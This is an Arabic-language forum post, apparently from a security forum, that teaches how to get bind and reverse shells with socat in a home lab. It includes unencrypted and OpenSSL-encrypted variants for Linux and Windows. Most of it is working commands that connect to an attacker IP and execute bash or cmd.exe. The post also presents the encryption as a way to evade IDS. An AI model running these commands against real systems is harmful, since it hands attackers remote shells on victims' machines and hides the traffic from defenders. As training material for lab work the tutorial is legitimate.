Loading...

BTC DONATE : 1D8Aq4q2jQnvGD1GaK9vbNwKgm1K5zUEWL


HEXED عضو نشيط
  • شكراً: 230
  • تم شكره 26 مرة في 8 مشاركة

كذلك فمن المعروف تماما أن عنوان سكين الجيش السويسري من أدوات الشبكة تمت ترسيته على أداة netcat . على الرغم من وجود هذه الأداة الأخرى المسماة socat والتي ربما تكون قد سمعتها أو لم تسمع بها من قبل ، إلا أنها تستحق هذا العنوان أكثر قليلاً. السبب وراء ذلك ، وببساطة ، هو أن ميزات netcat هي مجموعة فرعية من ميزات socat. لن نتوسع في كيفية استخدام socat ، ولكن إذا كنت مهتمًا بها ، فهناك العديد من المصادر المتاحة على الإنترنت للقراءة.

في هذه المقالة سوف نرى كيفية استخدام socat في سيناريو وهمي للمهاجم والضحية ، حيث نحاول الحصول على قذيفة لجهاز الضحية. سنرى كلاً من الأصداف المربوطة والعكسية وكذلك الفرق بين حركة المرور المشفرة وغير المشفرة. تنطبق الطرق الموضحة على كل من Linux و Windows.

ربط شل
شل العكسي
تشفير ربط شل
تشفير عكسي شل
كيف يتم اعتبار عمل الأصداف العكسية والربط أمرًا مفروغًا منه ، لذا إذا كان لديك بعض الأسئلة حول اختلافاتهم ، فتأكد من البحث في Google قليلاً عن ذلك قبل المضي قدمًا.

وانشاء
كبيئة اختبار ، نحن نستخدم تثبيت kali linux vmware والذي سيكون "الضحية" في السيناريو الخاص بنا والجهاز المضيف ، الذي يعمل أيضًا بنظام Linux ، سيكون هو المهاجم. عنوان IP للجهاز المضيف هو 192.168.168.1 وعنوان IP للضحية هو 192.168.168.130. لقد وضعنا دليلًا مسمى ereفي سطح مكتب الضحية حيث يحتوي على ملف نصي مسمى بمحتوى this is a simple test file :. سيكون هدفنا في الاختبارات هو قراءة محتويات هذا الملف من جهاز المهاجم الخاص بنا.



ربط شل
في هذا السيناريو ، ستستمع socat إلى منفذ في الضحية (آلة kali) وتنتظر أي اتصال جديد. من أجل إعداد هذا ، نحتاج إلى تشغيل الأمر التالي للضحية.

socat -d -d TCP4-LISTEN:4443 EXEC:/bin/bash

سيؤدي هذا إلى فتح المنفذ 4443 والاستماع إليه وعند اتصال جديد /bin/bashسيتم تنفيذه ، مما يمنح المهاجم بهذه الطريقة قذيفة بعيدة.

ملاحظة : إذا كانت الآلة الضحية لدينا عبارة عن جهاز يعمل بنظام Windows ، فسيتم تعديل الأمر أعلاه إلى socat -d -d TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes.

على جهاز المهاجم الخاص بنا ، نقوم الآن بتشغيل socat بالأمر التالي حتى يتمكن من الاتصال بالضحية. تذكر أن IP الخاص بالضحية هو 192.168.168.130.

socat - TCP4:192.168.168.130:4443

هذا يخبر socat بالاتصال بـ IP الخاص بالضحية على المنفذ 4443 الذي نعرف أنه مفتوح منذ أن قمنا بإعداد المستمع في هذا المنفذ ، باستخدام بروتوكول TCP4.

دعنا نراها تعمل في الشكل التالي.


في الجزء العلوي الأيسر من الغلاف الذي يخص المهاجم ، نرى أنه يمكننا قراءة محتويات erالملف بنجاح. على الجزء الأيمن من الصورة هو الضحية (كالي) حيث يعمل مستمع socat. ألقِ نظرة أيضًا على الجزء الأيسر السفلي حيث يتم تشغيل wireshark والتقاط حركة المرور بين المهاجم والضحية. كما ترى فإن محتويات الملف متوفرة في wireshark أيضًا ويمكن لأي شخص يتفقد حركة المرور قراءتها!



شل العكسي
في الغلاف العكسي ، سنقوم بإعداد المستمع في جهاز المهاجم أولاً ثم نطلب من الضحية الاتصال مرة أخرى بالمهاجم. لذلك نستخدم أولاً الأمر التالي لبدء مستمع على جهاز المهاجم الخاص بنا.

socat -d -d TCP4-LISTEN:4443 STDOUT

ثم على الجهاز الضحية ، نقوم بتشغيل الأمر التالي الذي يحدد عنوان IP والمنفذ الصحيحين.

socat TCP4:192.168.168.1:4443 EXEC:/bin/bash

لاحظ أنه تم تضمين معلمة EXEC مرة أخرى والتي توعز إلى socat بتنفيذ bash shell عند الاتصال بالمهاجم.

ملاحظة : إذا كانت الآلة الضحية لدينا عبارة عن جهاز يعمل بنظام Windows ، فسيتم تعديل الأمر أعلاه إلى socat TCP4:192.168.168.1:4443 EXEC:'cmd.exe',pipes.

تظهر النتيجة في الشكل التالي.

في الجزء العلوي الأيسر لدينا قذيفة المهاجم التي تقرأ الملف الذي نستهدفه بنجاح وعلى اليمين الضحية حيث نفذنا الأمر الموضح سابقًا.

مرة أخرى في الجزء السفلي الأيسر نرى أن حركة المرور غير مشفرة وبالتالي يمكن لأي شخص يتنصت على الشبكة قراءة محتويات الملف أيضًا.



مشفر ربط شل
لنفترض الآن أننا نرغب في تشفير اتصالاتنا مع الضحية إما لأننا لا نريد أن يقوم أي شخص في الشبكة باستنشاق حركة المرور أو بسبب وجود IDS في مكانه وبهذه الطريقة يمكننا خداعها.

سوف نستخدم تشفير opensl لهذا الأمر الذي يسهل تحقيقه. نبدأ بإنشاء مفتاح وشهادة باستخدام الأمر التالي:

openssl req -newkey rsa:2048 -nodes -keyout bind.key -x509 -days 1000 -subj '/CN=www.mydom.com/O=My Company Name LTD./C=US' -out bind.crt

سيؤدي هذا إلى إنشاء ملف المفتاح المسمى bind.keyوملف الشهادة المسمى bind.crt. لكي نتمكن من استخدامها ، نحتاج فقط إلى تحويلها إلى ملف .pem وهو سهل للغاية حيث يتعين علينا ببساطة تجميعها باستخدام الأمر التالي.

cat bind.key bind.crt L> bind.pem

يوضح الشكل التالي العملية الموضحة أعلاه.


نظرًا لأننا نعتزم استخدام غلاف ربط ، يجب أن يكون واضحًا أن ملف bind.pem يجب أن يكون في جهاز الضحية ، حتى نتمكن من إنشاء ملف bind.pem في جهاز المهاجم الخاص بنا ثم نقله إلى الضحية. الأمر الأخير الذي نحتاج إلى تشغيله على جهاز الضحية هو ما يلي:

socat OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork EXEC:/bin/bash

لاحظ أننا هذه المرة لا نستخدم بروتوكول TCP4 ولكن بروتوكول OPENSSL. لاحظ أيضًا أننا حددنا verify=0ما يعني أننا لا نرغب في التحقق من الشهادة.

ملاحظة : إذا كانت الآلة الضحية لدينا عبارة عن جهاز يعمل بنظام Windows ، فسيتم تعديل الأمر أعلاه إلى socat OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork EXEC:'cmd.exe',pipes.

من جانب المهاجم نقوم الآن بتنفيذ ما يلي

socat - OPENSSL:192.168.168.130:4443,verify=0

يظهر تمثيل في الشكل التالي.


كما ترى في الجزء العلوي الأيسر من الغلاف ، يمكننا مرة أخرى قراءة محتويات الملف الذي نستهدفه من الضحية. الشيء المهم الذي يجب ملاحظته هو الجزء السفلي الأيسر ، حيث يكشف wireshark أننا لم نعد قادرين على قراءة حركة المرور التي تم اعتراضها بين المهاجم والضحية. هذا نتيجة لاستخدام تشفير opensl.



قذيفة عكسية مشفرة
في سيناريو مشابه للسابق ، أنشأنا شهادة .pem التي سنستخدمها للتشفير. يجب أن يكون هذا الملف موجودًا في جهاز المهاجم ويكون الأمر المراد تشغيله كالتالي:
socat -d -d OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork STDOUT

سيؤدي هذا إلى إنشاء مستمع بالشهادة المحددة وسيتم تشعب كل اتصال وارد جديد ، مما يسمح باتصالات متعددة. الآن على جانب الضحية ، سينتج عن الأمر التالي إكمال قذيفة عكسية.

socat OPENSSL:192.168.168.1:4443,verify=0 EXEC:/bin/bash

ملاحظة : إذا كانت الآلة الضحية لدينا عبارة عن جهاز يعمل بنظام Windows ، فسيتم تعديل الأمر أعلاه إلى socat OPENSSL:192.168.168.1:4443,verify=0 EXEC:'cmd.exe',pipes.

يوضح الشكل التالي العملية أعلاه:

.png
في الجزء السفلي الأيسر ، نتحقق من تشفير حركة المرور بين المهاجم والضحية.



استنتاج
رأينا في هذه المقالة كيفية إنشاء قذائف ربط وعكس باستخدام socat وكيفية الاستفادة من واحدة من العديد من الميزات التي تقدمها socat ، و openssl. قدمنا ​​الأوامر المطلوبة لإنشاء نوعين من القذائف إلى جانب كيفية إنشاء ملف .pem الخاص بك لتشفير حركة المرور الخاصة بك.

توقيع
مبرمج zeezo
http://hackerrank.com/zeezo/
5 أعضاء قالوا شكراً لـ HEXED على المشاركة المفيدة:
أدوات الموضوع
انواع عرض الموضوع


Powered by vBulletin® Copyright ©2000 - 2022, Jelsoft Enterprises Ltd.

:: Security By : Sec4ever Team ::

جميع الحقوق محفوظة الحماية للأبد -Security 4 Ever
Sec4ever by Sec4ever
جميع الحقوق محفوظة الحماية للأبد -Security 4 Ever
Sec4ever by Sec4ever